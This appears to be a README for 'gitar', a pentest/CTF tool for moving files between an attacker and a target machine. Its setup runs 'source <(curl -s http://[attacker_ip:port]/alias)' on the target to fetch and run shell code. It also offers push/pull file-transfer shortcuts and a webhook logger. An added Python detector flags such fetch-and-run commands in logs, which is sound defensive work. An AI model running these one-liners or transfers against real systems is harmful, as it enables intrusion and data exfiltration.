📡 A more sophisticated Python HTTP server sibling
🎸 focusing on having the simplest interactions for file exchange (Pentest/CTF)
🎵 with additional functionalities: quick file sending and HTTP webhook logging
- Have the simplest possible shortcuts to upload/download files to/from the target machine
- No installation needed on the target machine
- Fast and simple deployment

On my target machine:
- Download a file from my attacker machine: `pull [file]` (with filename completion)
- Download a directory from my attacker machine: `pullr [directory]` (with filename completion)
- Upload a file to my attacker machine: `push [file]`
- Upload a directory to my attacker machine: `pushr [directory]`

Before you can use these shortcuts, you have to set up both machines. Once again, the aim is to make it as simple as possible.

On Attacker machine:
```
gitar
```
On Target machine:
```
# Get the shortcuts and source them. The corresponding one-liner is copied to the clipboard by default.
# It is also provided by step 1 (in the gitar output):
source <(curl -s http://[attacker_ip:port]/alias)
```
And that's all, you can now `push` or `pull` files 🎶
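
For defenders, the setup one-liner above leaves a recognizable trace in command-line telemetry: a shell sourcing the output of `curl` fetched over plain HTTP. The following is an added example, not part of gitar, that flags this pattern and the related pipe-to-shell form. The log format, host names, port and addresses are constructed assumptions.

```python
import re

# curl/wget invocation carrying a URL; the URL is captured for triage.
FETCH = r"(?:curl|wget)\b[^|;&<>()]*?(?P<url>https?://[^\s'\")]+)"
RULES = [
    # source <(curl ...), . <(curl ...), bash <(curl ...)
    ("process-substitution",
     re.compile(r"(?:^|[\s;&|])(?:source|\.|bash|sh|zsh)\s+<\(\s*" + FETCH + r"[^)]*\)")),
    # curl ... | sh
    ("pipe-to-shell",
     re.compile(FETCH + r"[^|;&]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b")),
]

def classify(cmd):
    """Return (rule, url, plain_http) if cmd runs fetched content in a shell, else None."""
    for name, rx in RULES:
        m = rx.search(cmd)
        if m:
            url = m.group("url")
            return name, url, url.startswith("http://")
    return None

def scan(lines):
    """Yield (host, user, finding) for each log line whose cmd= field matches a rule."""
    for line in lines:
        head, sep, cmd = line.partition(" cmd=")
        if not sep:
            continue
        fields = dict(f.split("=", 1) for f in head.split()[1:] if "=" in f)
        finding = classify(cmd)
        if finding:
            yield fields.get("host"), fields.get("user"), finding

# Constructed sample log lines (hypothetical format: timestamp host= user= cmd=).
SAMPLE = [
    "2024-05-01T10:02:11Z host=web01 user=www-data cmd=source <(curl -s http://203.0.113.7:8000/alias)",
    "2024-05-01T10:03:40Z host=web01 user=deploy cmd=curl -fsSL https://example.org/install.sh | sh",
    "2024-05-01T10:04:02Z host=web01 user=deploy cmd=curl -s http://203.0.113.7:8000/health | grep ok",
    "2024-05-01T10:05:19Z host=db01 user=root cmd=source ~/.bashrc",
]

if __name__ == "__main__":
    for host, user, (rule, url, plain) in scan(SAMPLE):
        print(f"{host} {user} {rule} {url} plain_http={plain}")
```

The `plain_http` flag separates unencrypted fetches, which are the higher-priority findings, from HTTPS installer pipes.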

This is basically the same as launching the `gitar` server. But as we expose our HTTP server, we become the prey. Hence we must harden the server a bit. To do this, we launch `gitar` inside a container and use HTTPS.

The following steps expose the files of the current directory. Files uploaded by the remote machine are also written to the current directory.

On Attacker machine:
```
docker run -it --rm --net host --cap-drop=all --cap-add=dac_override --user $(id -u):$(id -g) -v "${PWD}:/gitar/exchange" ariary/gitar
```
You can now `push` or `pull` files more safely 🎶

- HTTP network connectivity between attacker & target machines
- On target machine:
  - `curl`
  - `tar` for directory upload
- On attacker machine:
  - `xclip`: to copy the command to the clipboard (not required)
  - `tree`: to expose it through the server (not required)
  - `dig`: to automatically find the external IP (not required)

The aim is to keep "target requirements" as light as possible. Attacker machine requirements are not a big deal, as we have plenty of control over it and time to configure it.

Use this mode to quickly send a file to a target machine using different methods/protocols. The advantage is that you do not have to remember the command line (if a required field is not specified with flags, it will be asked for in a prompt).

It also has a kind of memory: with the `-l` flag it will use the previous configuration to send the file.
```
# send /img folder using scp with user root to target.com
gitar send scp -t target.com -u root /img
# now send exploit.sh to the same host
gitar send -l exploit.sh
```

Use this mode if you want to have some logs about incoming HTTP requests. It enables us to:
- Log request information
  - request parameter values
  - request header values
  - request body
- Override response
  - header
- Forward request to another HTTP server (~ local logging middleware)
- Serve directory
```
# log incoming request and retrieve payload parameter value
gitar webhook -P payload
```

```
go install github.com/ariary/gitar@latest
```